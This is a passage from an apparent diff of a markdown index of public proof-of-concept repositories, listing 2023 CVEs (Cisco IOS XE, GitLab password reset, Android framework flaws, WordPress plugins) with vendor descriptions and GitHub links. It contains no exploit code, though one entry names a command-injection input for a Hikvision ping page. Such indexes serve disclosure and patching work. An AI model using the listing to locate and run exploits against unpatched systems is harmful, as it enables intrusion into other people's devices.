reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover. + + +- [UlyssesSaicha/CVE-2023-6875](https://github.com/UlyssesSaicha/CVE-2023-6875) +- [gbrsh/CVE-2023-6875](https://github.com/gbrsh/CVE-2023-6875) +- [hatlesswizard/CVE-2023-6875](https://github.com/hatlesswizard/CVE-2023-6875) + +### CVE-2023-6895 (2023-12-17) + +In Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) wurde eine Schwachstelle ausgemacht. Sie wurde als kritisch eingestuft. Hierbei betrifft es unbekannten Programmcode der Datei /php/ping.php. Mittels Manipulieren des Arguments jsondata[ip] mit der Eingabe netstat -ano mit unbekannten Daten kann eine os command injection-Schwachstelle ausgenutzt werden. Der Exploit steht zur öffentlichen Verfügung. Ein Aktualisieren auf die Version 4.1.0 vermag dieses Problem zu lösen. Als bestmögliche Massnahme wird das Einspielen eines Upgrades empfohlen. + + +- [FuBoLuSec/CVE-2023-6895](https://github.com/FuBoLuSec/CVE-2023-6895) +- [nles-crt/CVE-2023-6895](https://github.com/nles-crt/CVE-2023-6895) + +### CVE-2023-6931 (2023-12-19) + +A heap out-of-bounds write vulnerability in the Linux kernel's Performance Events system component can be exploited to achieve local privilege escalation.\n\nA perf_event's read_size can overflow, leading to an heap out-of-bounds increment or write in perf_read_group().\n\nWe recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b.\n\n + + +- [K0n9-log/CVE-2023-6931](https://github.com/K0n9-log/CVE-2023-6931) + +### CVE-2023-6933 (2024-02-05) + +The Better Search Replace plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.4.4 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. + + +- [w2xim3/CVE-2023-6933](https://github.com/w2xim3/CVE-2023-6933) + +### CVE-2023-6985 (2024-02-05) + +The 10Web AI Assistant – AI content writing assistant plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the install_plugin AJAX action in all versions up to, and including, 1.0.18. This makes it possible for authenticated attackers, with subscriber-level access and above, to install arbitrary plugins that can be used to gain further access to a compromised site. + + +- [RandomRobbieBF/CVE-2023-6985](https://github.com/RandomRobbieBF/CVE-2023-6985) + +### CVE-2023-7016 (2024-02-27) + +A flaw in Thales SafeNet Authentication Client prior to 10.8 R10 on Windows allows an attacker to execute code at a SYSTEM level via local access. + + +- [ewilded/CVE-2023-7016-POC](https://github.com/ewilded/CVE-2023-7016-POC) + +### CVE-2023-7028 (2024-01-12) + +An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address. + + +- [RandomRobbieBF/CVE-2023-7028](https://github.com/RandomRobbieBF/CVE-2023-7028) +- [googlei1996/CVE-2023-7028](https://github.com/googlei1996/CVE-2023-7028) +- [duy-31/CVE-2023-7028](https://github.com/duy-31/CVE-2023-7028) +- [Vozec/CVE-2023-7028](https://github.com/Vozec/CVE-2023-7028) +- [yoryio/CVE-2023-7028](https://github.com/yoryio/CVE-2023-7028) +- [Esonhugh/gitlab_honeypot](https://github.com/Esonhugh/gitlab_honeypot) +- [Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab](https://github.com/Shimon03/CVE-2023-7028-Account-Take-Over-Gitlab) +- [thanhlam-attt/CVE-2023-7028](https://github.com/thanhlam-attt/CVE-2023-7028) +- [Trackflaw/CVE-2023-7028-Docker](https://github.com/Trackflaw/CVE-2023-7028-Docker) +- [mochammadrafi/CVE-2023-7028](https://github.com/mochammadrafi/CVE-2023-7028) +- [hackeremmen/gitlab-exploit](https://github.com/hackeremmen/gitlab-exploit) +- [soltanali0/CVE-2023-7028](https://github.com/soltanali0/CVE-2023-7028) +- [gh-ost00/CVE-2023-7028](https://github.com/gh-ost00/CVE-2023-7028) + +### CVE-2023-7172 (2023-12-30) + +Eine kritische Schwachstelle wurde in PHPGurukul Hospital Management System 1.0 entdeckt. Es geht hierbei um eine nicht näher spezifizierte Funktion der Komponente Admin Dashboard. Durch Manipulieren mit unbekannten Daten kann eine sql injection-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk angegangen werden. Der Exploit steht zur öffentlichen Verfügung. + + +- [sharathc213/CVE-2023-7172](https://github.com/sharathc213/CVE-2023-7172) + +### CVE-2023-7173 (2023-12-30) + +Es wurde eine problematische Schwachstelle in PHPGurukul Hospital Management System 1.0 gefunden. Es geht dabei um eine nicht klar definierte Funktion der Datei registration.php. Durch das Beeinflussen des Arguments First Name mit unbekannten Daten kann eine cross site scripting-Schwachstelle ausgenutzt werden. Der Angriff kann über das Netzwerk passieren. Der Exploit steht zur öffentlichen Verfügung. + + +- [sharathc213/CVE-2023-7173](https://github.com/sharathc213/CVE-2023-7173) + +### CVE-2023-7261 (2024-06-07) + +Inappropriate implementation in Google Updator prior to 1.3.36.351 in Google Chrome allowed a local attacker to perform privilege escalation via a malicious file. (Chromium security severity: High) + + +- [zerozenxlabs/CVE-2023-7261](https://github.com/zerozenxlabs/CVE-2023-7261) + +### CVE-2023-20025 (2023-01-19) + +A vulnerability in the web-based management interface of Cisco Small Business RV042 Series Routers could allow an unauthenticated, remote attacker to bypass authentication on the affected device.\r\n\r This vulnerability is due to incorrect user input validation of incoming HTTP packets. An attacker could exploit this vulnerability by sending crafted requests to the web-based management interface. A successful exploit could allow the attacker to gain root privileges on the affected device.\r\n + + +- [lnversed/CVE-2023-20025](https://github.com/lnversed/CVE-2023-20025) + +### CVE-2023-20048 (2023-11-01) + +A vulnerability in the web services interface of Cisco Firepower Management Center (FMC) Software could allow an authenticated, remote attacker to execute certain unauthorized configuration commands on a Firepower Threat Defense (FTD) device that is managed by the FMC Software. This vulnerability is due to insufficient authorization of configuration commands that are sent through the web service interface. An attacker could exploit this vulnerability by authenticating to the FMC web services interface and sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to execute certain configuration commands on the targeted FTD device. To successfully exploit this vulnerability, an attacker would need valid credentials on the FMC Software. + + +- [0zer0d4y/FuegoTest](https://github.com/0zer0d4y/FuegoTest) + +### CVE-2023-20052 (2023-02-16) + +On Feb 15, 2023, the following vulnerability in the ClamAV scanning library was disclosed:\r\n\r \r A vulnerability in the DMG file parser of ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier could allow an unauthenticated, remote attacker to access sensitive information on an affected device.\r\n\r \r This vulnerability is due to enabling XML entity substitution that may result in XML external entity injection. An attacker could exploit this vulnerability by submitting a crafted DMG file to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to leak bytes from any file that may be read by the ClamAV scanning process. + + +- [nokn0wthing/CVE-2023-20052](https://github.com/nokn0wthing/CVE-2023-20052) +- [cY83rR0H1t/CVE-2023-20052](https://github.com/cY83rR0H1t/CVE-2023-20052) + +### CVE-2023-20073 (2023-04-05) + +A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device. + + +- [RegularITCat/CVE-2023-20073](https://github.com/RegularITCat/CVE-2023-20073) + +### CVE-2023-20110 (2023-05-18) + +A vulnerability in the web-based management interface of Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. This vulnerability exists because the web-based management interface inadequately validates user input. An attacker could exploit this vulnerability by authenticating to the application as a low-privileged user and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to read sensitive data on the underlying database. + + +- [redfr0g/CVE-2023-20110](https://github.com/redfr0g/CVE-2023-20110) + +### CVE-2023-20126 (2023-05-04) + +A vulnerability in the web-based management interface of Cisco SPA112 2-Port Phone Adapters could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to a missing authentication process within the firmware upgrade function. An attacker could exploit this vulnerability by upgrading an affected device to a crafted version of firmware. A successful exploit could allow the attacker to execute arbitrary code on the affected device with full privileges. Cisco has not released firmware updates to address this vulnerability. + + +- [fullspectrumdev/RancidCrisco](https://github.com/fullspectrumdev/RancidCrisco) + +### CVE-2023-20178 (2023-06-28) + +A vulnerability in the client update process of Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco Secure Client Software for Windows could allow a low-privileged, authenticated, local attacker to elevate privileges to those of SYSTEM. The client update process is executed after a successful VPN connection is established.\r\n\r This vulnerability exists because improper permissions are assigned to a temporary directory that is created during the update process. An attacker could exploit this vulnerability by abusing a specific function of the Windows installer process. A successful exploit could allow the attacker to execute code with SYSTEM privileges. + + +- [Wh04m1001/CVE-2023-20178](https://github.com/Wh04m1001/CVE-2023-20178) + +### CVE-2023-20198 (2023-10-16) + +Cisco is providing an update for the ongoing investigation into observed exploitation of the web UI feature in Cisco IOS XE Software. We are updating the list of fixed releases and adding the Software Checker. Our investigation has determined that the actors exploited two previously unknown issues. The attacker first exploited CVE-2023-20198 to gain initial access and issued a privilege 15 command to create a local user and password combination. This allowed the user to log in with normal user access. The attacker then exploited another component of the web UI feature, leveraging the new local user to elevate privilege to root and write the implant to the file system. Cisco has assigned CVE-2023-20273 to this issue. CVE-2023-20198 has been assigned a CVSS Score of 10.0. CVE-2023-20273 has been assigned a CVSS Score of 7.2. Both of these CVEs are being tracked by CSCwh87343. + + +- [raystr-atearedteam/CVE-2023-20198-checker](https://github.com/raystr-atearedteam/CVE-2023-20198-checker) +- [Atea-Redteam/CVE-2023-20198](https://github.com/Atea-Redteam/CVE-2023-20198) +- [securityphoenix/cisco-CVE-2023-20198-tester](https://github.com/securityphoenix/cisco-CVE-2023-20198-tester) +- [emomeni/Simple-Ansible-for-CVE-2023-20198](https://github.com/emomeni/Simple-Ansible-for-CVE-2023-20198) +- [ZephrFish/CVE-2023-20198-Checker](https://github.com/ZephrFish/CVE-2023-20198-Checker) +- [JoyGhoshs/CVE-2023-20198](https://github.com/JoyGhoshs/CVE-2023-20198) +- [Tounsi007/CVE-2023-20198](https://github.com/Tounsi007/CVE-2023-20198) +- [alekos3/CVE_2023_20198_Detector](https://github.com/alekos3/CVE_2023_20198_Detector) +- [reket99/Cisco_CVE-2023-20198](https://github.com/reket99/Cisco_CVE-2023-20198) +- [iveresk/cve-2023-20198](https://github.com/iveresk/cve-2023-20198) +- [sohaibeb/CVE-2023-20198](https://github.com/sohaibeb/CVE-2023-20198) +- [fox-it/cisco-ios-xe-implant-detection](https://github.com/fox-it/cisco-ios-xe-implant-detection) +- [Pushkarup/CVE-2023-20198](https://github.com/Pushkarup/CVE-2023-20198) +- [Shadow0ps/CVE-2023-20198-Scanner](https://github.com/Shadow0ps/CVE-2023-20198-Scanner) +- [kacem-expereo/CVE-2023-20198](https://github.com/kacem-expereo/CVE-2023-20198) +- [mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner](https://github.com/mr-r3b00t/CVE-2023-20198-IOS-XE-Scanner) +- [ohlawd/CVE-2023-20198](https://github.com/ohlawd/CVE-2023-20198) +- [IceBreakerCode/CVE-2023-20198](https://github.com/IceBreakerCode/CVE-2023-20198) +- [RevoltSecurities/CVE-2023-20198](https://github.com/RevoltSecurities/CVE-2023-20198) +- [smokeintheshell/CVE-2023-20198](https://github.com/smokeintheshell/CVE-2023-20198) +- [netbell/CVE-2023-20198-Fix](https://github.com/netbell/CVE-2023-20198-Fix) +- [Vulnmachines/Cisco_CVE-2023-20198](https://github.com/Vulnmachines/Cisco_CVE-2023-20198) +- [W01fh4cker/CVE-2023-20198-RCE](https://github.com/W01fh4cker/CVE-2023-20198-RCE) +- [sanan2004/CVE-2023-20198](https://github.com/sanan2004/CVE-2023-20198) +- [AhmedMansour93/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-](https://github.com/AhmedMansour93/Event-ID-193-Rule-Name-SOC231-Cisco-IOS-XE-Web-UI-ZeroDay-CVE-2023-20198-) +- [XiaomingX/cve-2023-20198-poc](https://github.com/XiaomingX/cve-2023-20198-poc) + +### CVE-2023-20209 (2023-08-16) + +A vulnerability in the web-based management interface of Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an authenticated, remote attacker with read-write privileges on the application to perform a command injection attack that could result in remote code execution on an affected device.\r\n\r This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface of an affected device. A successful exploit could allow the attacker to establish a remote shell with root privileges. + + +- [peter5he1by/CVE-2023-20209](https://github.com/peter5he1by/CVE-2023-20209) + +### CVE-2023-20273 (2023-10-24) + +A vulnerability in the web UI feature of Cisco IOS XE Software could allow an authenticated, remote attacker to inject commands with the privileges of root. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted input to the web UI. A successful exploit could allow the attacker to inject commands to the underlying operating system with root privileges. + + +- [smokeintheshell/CVE-2023-20273](https://github.com/smokeintheshell/CVE-2023-20273) + +### CVE-2023-20562 (2023-08-08) + +\n\n\nInsufficient validation in the IOCTL (Input Output Control) input buffer in AMD uProf may allow an authenticated user to load an unsigned driver potentially leading to arbitrary kernel execution.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n + + +- [zeze-zeze/HITCON-2023-Demo-CVE-2023-20562](https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562) +- [passwa11/HITCON-2023-Demo-CVE-2023-20562](https://github.com/passwa11/HITCON-2023-Demo-CVE-2023-20562) + +### CVE-2023-20573 (2024-01-11) + +A privileged attacker\ncan prevent delivery of debug exceptions to SEV-SNP guests potentially\nresulting in guests not receiving expected debug information.\n\n\n\n + + +- [Freax13/cve-2023-20573-poc](https://github.com/Freax13/cve-2023-20573-poc) + +### CVE-2023-20593 (2023-07-24) + +\nAn issue in “Zen 2” CPUs, under specific microarchitectural circumstances, may allow an attacker to potentially access sensitive information.\n\n\n\n\n\n\n + + +- [sbaresearch/stop-zenbleed-win](https://github.com/sbaresearch/stop-zenbleed-win) + +### CVE-2023-20598 (2023-10-17) + +\n\n\nAn improper privilege management in the AMD Radeon™ Graphics driver may allow an authenticated attacker to craft an IOCTL request to gain I/O control over arbitrary hardware ports or physical addresses resulting in a potential arbitrary code execution.\n\n\n\n + + +- [H4rk3nz0/CVE-2023-20598-PDFWKRNL](https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL) + +### CVE-2023-20860 (2023-03-27) + +Spring Framework running version 6.0.0 - 6.0.6 or 5.3.0 - 5.3.25 using "**" as a pattern in Spring Security configuration with the mvcRequestMatcher creates a mismatch in pattern matching between Spring Security and Spring MVC, and the potential for a security bypass. + + +- [limo520/CVE-2023-20860](https://github.com/limo520/CVE-2023-20860) + +### CVE-2023-20872 (2023-04-25) + +VMware Workstation and Fusion contain an out-of-bounds read/write vulnerability in SCSI CD/DVD device emulation. + + +- [ze0r/vmware-escape-CVE-2023-20872-poc](https://github.com/ze0r/vmware-escape-CVE-2023-20872-poc) + +### CVE-2023-20887 (2023-06-07) + +Aria Operations for Networks contains a command injection vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in remote code execution. + + +- [sinsinology/CVE-2023-20887](https://github.com/sinsinology/CVE-2023-20887) +- [miko550/CVE-2023-20887](https://github.com/miko550/CVE-2023-20887) +- [Malwareman007/CVE-2023-20887](https://github.com/Malwareman007/CVE-2023-20887) + +### CVE-2023-20909 (2023-04-19) + +In multiple functions of RunningTasks.java, there is a possible privilege escalation due to a missing privilege check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-243130512 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20909](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20909) +- [Trinadh465/platform_frameworks_base_AOSP10_r33_CVE-2023-20909](https://github.com/Trinadh465/platform_frameworks_base_AOSP10_r33_CVE-2023-20909) + +### CVE-2023-20911 (2023-03-24) + +In addPermission of PermissionManagerServiceImpl.java , there is a possible failure to persist permission settings due to resource exhaustion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-242537498 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20911](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20911) + +### CVE-2023-20918 (2023-07-12) + +In getPendingIntentLaunchFlags of ActivityOptions.java, there is a possible elevation of privilege due to a confused deputy with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918](https://github.com/pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-20918) +- [Trinadh465/platform_frameworks_base_CVE-2023-20918](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-20918) + +### CVE-2023-20921 (2023-01-24) + +In onPackageRemoved of AccessibilityManagerService.java, there is a possibility to automatically grant accessibility services due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-243378132 + + +- [Trinadh465/frameworks_base_android-6.0.1_r22_CVE-2023-20921](https://github.com/Trinadh465/frameworks_base_android-6.0.1_r22_CVE-2023-20921) + +### CVE-2023-20933 (2023-02-28) + +In several functions of MediaCodec.cpp, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-245860753 + + +- [Trinadh465/frameworks_av_CVE-2023-20933](https://github.com/Trinadh465/frameworks_av_CVE-2023-20933) +- [hshivhare67/platform_frameworks_av_AOSP10_r33_CVE-2023-20933](https://github.com/hshivhare67/platform_frameworks_av_AOSP10_r33_CVE-2023-20933) + +### CVE-2023-20943 (2023-02-28) + +In clearApplicationUserData of ActivityManagerService.java, there is a possible way to remove system files due to a path traversal error. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-240267890 + + +- [Trinadh465/frameworks_base_CVE-2023-20943](https://github.com/Trinadh465/frameworks_base_CVE-2023-20943) +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20943](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20943) + +### CVE-2023-20944 (2023-02-28) + +In run of ChooseTypeAndAccountActivity.java, there is a possible escalation of privilege due to unsafe deserialization. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-244154558 + + +- [Trinadh465/frameworks_base_CVE-2023-20944](https://github.com/Trinadh465/frameworks_base_CVE-2023-20944) +- [hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20944](https://github.com/hshivhare67/platform_frameworks_base_AOSP10_r33_CVE-2023-20944) + +### CVE-2023-20945 (2023-02-28) + +In phNciNfc_MfCreateXchgDataHdr of phNxpExtns_MifareStd.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-246932269 + + +- [Ailenchick/CVE-2023-20945](https://github.com/Ailenchick/CVE-2023-20945) + +### CVE-2023-20955 (2023-03-24) + +In onPrepareOptionsMenu of AppInfoDashboardFragment.java, there is a possible way to bypass admin restrictions and uninstall applications for all users due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-258653813 + + +- [Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2023-20955](https://github.com/Trinadh465/packages_apps_Settings_AOSP10_r33_CVE-2023-20955) + +### CVE-2023-20963 (2023-03-24) + +In WorkSource, there is a possible parcel mismatch. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-220302519 + + +- [pwnipc/BadParcel](https://github.com/pwnipc/BadParcel) +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20963](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-20963) +- [Ailenchick/CVE-2023-20963](https://github.com/Ailenchick/CVE-2023-20963) + +### CVE-2023-21036 (2023-03-24) + +In BitmapExport.java, there is a possible failure to truncate images due to a logic error in the code.Product: AndroidVersions: Android kernelAndroid ID: A-264261868References: N/A + + +- [qixils/AntiCropalypse](https://github.com/qixils/AntiCropalypse) +- [infobyte/CVE-2023-21036](https://github.com/infobyte/CVE-2023-21036) +- [notaSWE/gocropalypse](https://github.com/notaSWE/gocropalypse) +- [lordofpipes/acropadetect](https://github.com/lordofpipes/acropadetect) + +### CVE-2023-21086 (2023-04-19) + +In isToggleable of SecureNfcEnabler.java and SecureNfcPreferenceController.java, there is a possible way to enable NFC from a secondary account due to a permissions bypass. This could lead to local escalation of privilege from the Guest account with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-238298970 + + +- [Trinadh465/packages_apps_Settings_CVE-2023-21086](https://github.com/Trinadh465/packages_apps_Settings_CVE-2023-21086) + +### CVE-2023-21094 (2023-04-19) + +In sanitize of LayerState.cpp, there is a possible way to take over the screen display and swap the display content due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-248031255 + + +- [Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21094](https://github.com/Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21094) + +### CVE-2023-21097 (2023-04-19) + +In toUriInner of Intent.java, there is a possible way to launch an arbitrary activity due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-261858325 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097) +- [uthrasri/frameworks_base_AOSP10_r33_CVE-2023-21097](https://github.com/uthrasri/frameworks_base_AOSP10_r33_CVE-2023-21097) + +### CVE-2023-21109 (2023-05-15) + +In multiple places of AccessibilityService, there is a possible way to hide the app from the user due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-261589597 + + +- [Trinadh465/frameworks_base_AOSP10_CVE-2023-21109r33_](https://github.com/Trinadh465/frameworks_base_AOSP10_CVE-2023-21109r33_) +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21109](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21109) + +### CVE-2023-21118 (2023-05-15) + +In unflattenString8 of Sensor.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-269014004 + + +- [Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118](https://github.com/Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118) +- [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2023-21118](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2023-21118) + +### CVE-2023-21144 (2023-06-15) + +In doInBackground of NotificationContentInflater.java, there is a possible temporary denial or service due to long running operations. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-252766417 + + +- [hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144_old](https://github.com/hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144_old) +- [hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144](https://github.com/hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144) + +### CVE-2023-21238 (2023-07-12) + +In visitUris of RemoteViews.java, there is a possible leak of images between users due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238) + +### CVE-2023-21246 (2023-07-12) + +In ShortcutInfo of ShortcutInfo.java, there is a possible way for an app to retain notification listening access due to an uncaught exception. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21246](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21246) + +### CVE-2023-21251 (2023-07-12) + +In onCreate of ConfirmDialog.java, there is a possible way to connect to VNP bypassing user's consent due to improper input validation. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.\n\n + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21251](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21251) + +### CVE-2023-21272 (2023-08-14) + +In readFrom of Uri.java, there is a possible bad URI permission grant due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272](https://github.com/Trinadh465/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272) +- [pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272](https://github.com/pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272) + +### CVE-2023-21275 (2023-08-14) + +In decideCancelProvisioningDialog of AdminIntegratedFlowPrepareActivity.java, there is a possible way to bypass factory reset protections due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275](https://github.com/Trinadh465/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275) + +### CVE-2023-21281 (2023-08-14) + +In multiple functions of KeyguardViewMediator.java, there is a possible failure to lock after screen timeout due to a logic error in the code. This could lead to local escalation of privilege across users with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/platform_frameworks_base_CVE-2023-21281](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21281) + +### CVE-2023-21282 (2023-08-14) + +In TRANSPOSER_SETTINGS of lpp_tran.h, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.\n\n + + +- [Trinadh465/external_aac_AOSP10_r33_CVE-2023-21282](https://github.com/Trinadh465/external_aac_AOSP10_r33_CVE-2023-21282) +- [Trinadh465/external_aac_android-4.2.2_r1_CVE-2023-21282](https://github.com/Trinadh465/external_aac_android-4.2.2_r1_CVE-2023-21282) + +### CVE-2023-21284 (2023-08-14) + +In multiple functions of DevicePolicyManager.java, there is a possible way to prevent enabling the Find my Device feature due to improper input validation. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21284](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21284) + +### CVE-2023-21285 (2023-08-14) + +In setMetadata of MediaSessionRecord.java, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [uthrasri/framework_base_CVE-2023-21285_NoPatch](https://github.com/uthrasri/framework_base_CVE-2023-21285_NoPatch) + +### CVE-2023-21286 (2023-08-14) + +In visitUris of RemoteViews.java, there is a possible way to reveal images across users due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/platform_frameworks_base_CVE-2023-21286](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21286) + +### CVE-2023-21288 (2023-08-14) + +In visitUris of Notification.java, there is a possible way to reveal images across users due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.\n\n + + +- [Trinadh465/platform_frameworks_base_CVE-2023-21288](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21288) + +### CVE-2023-21537 (2023-01-10) + +Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability + + +- [stevenjoezhang/CVE-2023-21537](https://github.com/stevenjoezhang/CVE-2023-21537) + +### CVE-2023-21554 (2023-04-11) + +Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability + + +- [zoemurmure/CVE-2023-21554-PoC](https://github.com/zoemurmure/CVE-2023-21554-PoC) +- [3tternp/CVE-2023-21554](https://github.com/3tternp/CVE-2023-21554) +- [Rahul-Thakur7/CVE-2023-21554](https://github.com/Rahul-Thakur7/CVE-2023-21554) + +### CVE-2023-21560 (2023-01-10) + +Windows Boot Manager Security Feature Bypass Vulnerability + + +- 